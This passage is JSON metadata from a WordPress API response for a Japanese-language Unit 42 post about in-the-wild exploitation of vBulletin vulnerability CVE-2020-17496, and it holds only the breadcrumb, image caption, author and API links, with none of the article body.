p-content\/uploads\/2024\/06\/03_Vulnerabilities_1920x900.jpg","width":1920,"height":900,"caption":"Abstract illustration of a network sppread like a spiderweb, connecting covering the globe and symbolizing data or communication links."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da","name":"Zhibin Zhang","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Zhibin Zhang"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/zhibin-zhang\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/108703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/278"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=108703"}],"version-history":[{"count":10,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/108703\/revisions"}],"predecessor-version":[{"id":108713,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/108703\/revisions\/108713"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/134412"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=108703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=108703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=108703"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=108703"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=108703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}